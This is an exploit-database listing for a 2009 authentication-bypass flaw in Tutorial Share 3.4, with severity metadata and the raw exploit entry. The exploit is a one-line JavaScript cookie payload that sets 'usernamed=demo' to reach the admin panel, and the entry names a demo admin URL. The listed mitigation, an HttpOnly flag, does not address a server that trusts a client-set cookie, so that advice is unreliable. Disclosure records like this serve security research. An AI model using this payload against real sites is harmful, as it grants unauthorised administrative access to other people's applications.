header-logo
Suggest Exploit
vendor:
Tutorial Share 3.4
by:
Evil-Cod3r
7,5
CVSS
HIGH
Insecure Cookie Handling
384
CWE
Product Name: Tutorial Share 3.4
Affected Version From: 3.4
Affected Version To: 3.4
Patch Exists: NO
Related CWE: N/A
CPE: a:tutorial-share:tutorial_share:3.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Tutorial Share 3.4 Insecure Cookie Handling Vulnerability

A vulnerability exists in Tutorial Share 3.4 which allows an attacker to set a cookie with the username of their choice. By setting the cookie to 'usernamed=demo;path=/', an attacker can gain access to the admin panel of the application. The vulnerable URL is www.site.com/admin/.

Mitigation:

Ensure that cookies are set with the 'HttpOnly' flag to prevent them from being accessed by client-side scripts.
Source

Exploit-DB raw data:

--------------------------------------------------------------
Tutorial Share 3.4 Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Auothr :Evil-Cod3r
Home: Creativexploit.com
Contact : Xky@hotmail.com & ie7@windowslive.com
Software : Tutorial Share 3.4
Home : tutorial-share.com
---------------------------------------------------------------
Exploit:
---------
www.site.com/admin/
javascript:document.cookie="usernamed=demo;path=/";
demo = username site :D
---------------------------------------------------------------
demo:
---------
http://www.tutorial-share.com/demo/admin/
-----------------------------------------------------------------------------------------------------
The-g0bL!N  - His0k4  - Cyb3r-Devil  - Mangear Play :) & Str0ke
-----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-05-22]